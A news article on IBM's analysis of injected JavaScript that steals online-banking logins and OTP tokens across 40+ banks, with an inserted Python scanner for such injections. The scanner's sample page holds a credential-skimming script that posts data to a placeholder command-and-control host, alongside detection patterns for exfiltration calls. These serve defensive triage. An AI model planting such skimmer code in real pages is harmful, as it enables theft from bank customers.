This JavaScript code reached 50,000 online banking sessions in 2023 • The Register

esteria.white

IBM Security analyzed JavaScript code that was injected into individuals’ online banking pages to steal their login credentials, saying 50,000 user sessions with more than 40 banks worldwide were compromised by the malware in 2023.

Judging by the available evidence, it appears that Windows malware DanaBot, or something related or connected to it, infects victims’ computers – usually through spam emails and other means – and then waits for the user to visit their bank’s website. At this point, the malware comes into play and injects JavaScript into the login page. This injected code runs on the browser page and intercepts the victim’s credentials as they are entered, which can be passed on to fraudsters to exploit to drain accounts.

The code was spotted attacking customers of dozens of financial organizations in North America, South America, Europe and Japan, according to IBM’s Tal Langus, who reported on it this week.

The criminals behind this adventure purchased the domain names used by the JavaScript code in December 2022 and launched their web injection campaign shortly after. We’re told the theft of credentials continues today. The JS targets a web page structure that several banks share across their sites, and it appears it can also harvest multi-factor authentication tokens from some of the targeted brands.

When the requested banking page “contains a certain keyword and a login button with a specific ID present, new malicious content is injected,” Langus explained. “Credential theft is performed by adding event listeners to this button, with an option to steal a one-time password (OTP) token with it.”

The script is pretty clever: it communicates with a remote command and control (C2) server and deletes itself from the DOM tree – deletes itself from the login page, basically – once it has finished its work, which makes it difficult to detect and analyze.

The malware can perform a series of harmful actions, based on an “mlink” flag sent by the C2. In total, the malware can perform nine different actions depending on the “mlink” value, we’re told.

These include injecting a prompt with the user’s phone number or a two-factor authentication token, which attackers can use along with the intercepted username and password to access the victim’s bank account and steal their money.

The script can also inject an error message on the login page stating that banking services will be unavailable for 12 hours. “This tactic aims to discourage the victim from attempting to access their account, providing the threat actor with the opportunity to perform uninterrupted actions,” Langus said.

Other actions include injecting a page loading overlay as well as cleaning any injected content from the page.
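The traits described above (a listener attached to a login button with a known id, a network call to carry the captured data away, the “mlink” flag, self-removal from the DOM, and scripts loaded from domains the bank does not own) are all visible in a capture of what the browser actually rendered, so a defender can triage such captures statically. The following is an added example, not code from IBM’s report or from the article: it scans a captured login page with Python’s standard library and reports each suspicious script. The bank domains, the `login-btn` element id, the `.invalid` hostnames and both sample pages are constructed placeholders.

```python
"""Static triage of a captured login page for injected credential-stealing scripts.

Added example (not from the IBM report or the article). It scans HTML as the
browser rendered it, e.g. from a proxy capture, for the traits the report
describes: an inline script that attaches an event listener to the login
button id and makes a network call, a reference to the "mlink" C2 flag, a
script that removes itself from the DOM, and external scripts served from
hosts outside the bank's own allowlist. All names below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed placeholders: a real deployment uses the bank's first-party
# script hosts and the login form's real element id.
ALLOWED_SCRIPT_DOMAINS = {"bank.example", "static.bank.example"}
LOGIN_BUTTON_ID = "login-btn"

# Patterns derived from the article's description of the injected script.
EVENT_HOOK_RE = re.compile(r"addEventListener\s*\(")
EXFIL_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b")
SELF_REMOVE_RE = re.compile(r"currentScript\b.*?\bremove(Child)?\s*\(", re.S)
MLINK_RE = re.compile(r"\bmlink\b")


class _ScriptCollector(HTMLParser):
    """Collect every <script> on the page, either its src or its inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []          # list of {"src": str | None, "body": str}
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            self.scripts.append({"src": src, "body": ""})
            self._in_inline = src is None

    def handle_data(self, data):
        # HTMLParser may deliver a script body in several chunks; append them.
        if self._in_inline and self.scripts:
            self.scripts[-1]["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_inline = False


def analyze_page(html, allowed_domains=ALLOWED_SCRIPT_DOMAINS, button_id=LOGIN_BUTTON_ID):
    """Return a list of finding strings; an empty list means nothing suspicious."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for i, script in enumerate(parser.scripts):
        if script["src"]:
            # Relative src (no hostname) is first-party; anything else must be allowlisted.
            host = urlparse(script["src"]).hostname or ""
            if host and host not in allowed_domains:
                findings.append(f"script[{i}]: external script from non-allowlisted host {host}")
            continue
        body = script["body"]
        if button_id in body and EVENT_HOOK_RE.search(body) and EXFIL_RE.search(body):
            findings.append(f"script[{i}]: inline listener on #{button_id} combined with a network call")
        if MLINK_RE.search(body):
            findings.append(f"script[{i}]: references the C2 flag name 'mlink'")
        if SELF_REMOVE_RE.search(body):
            findings.append(f"script[{i}]: script removes itself from the DOM")
    return findings


# Constructed sample: the bank's own login page as served.
CLEAN_PAGE = """<html><body>
<form id="login"><input name="user"><input name="pass" type="password">
<button id="login-btn">Sign in</button></form>
<script src="https://static.bank.example/app.js"></script>
</body></html>"""

# Constructed sample: the same page as rendered on an infected machine, with
# a loader from a non-bank host and an inline script of the kind described.
INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<script src="//cdn-placeholder.invalid/loader.js"></script>
<script>
  var b = document.getElementById("login-btn");
  b.addEventListener("click", function () {
    fetch("https://c2-placeholder.invalid/collect", {method: "POST", body: JSON.stringify({mlink: 1})});
  });
  document.currentScript.remove();
</script>
</body>""")

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, analyze_page(page) or ["no findings"])
```

The checks are deliberately independent so that each one is a weak signal on its own and only the combination (listener on the login button plus an outbound call, or an unknown script host on a login page) is worth paging someone for; the “mlink” string is specific to this campaign and will not survive a rename, whereas the allowlist check catches any injected loader regardless of how the payload is written.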

“This sophisticated threat has advanced capabilities, including executing man-in-browser attacks, with its dynamic communication, web injection methods, and ability to adapt based on server and browser instructions and current state of the page,” Langus warned. “Malware poses a significant threat to the security of financial institutions and their customers.”

He also urged bank customers to “be vigilant” with their banking apps. This includes using (and not reusing) strong passwords, not downloading software from unknown sources, and reporting any strange behavior to banks. Check out the article linked above for more technical information and some indicators of compromise, if you want to look for this particular malware. ®

PS: AT&T Alien Labs this week dug into information-stealing malware called JaskaGO, written in Go and considered “a serious threat to Windows and macOS operating systems”. The code uses several techniques to persist on an infected computer and can siphon data, including login information stored by browsers, and attack cryptocurrency wallets. The telco also shared indicators of compromise if you want to find and destroy this malware.
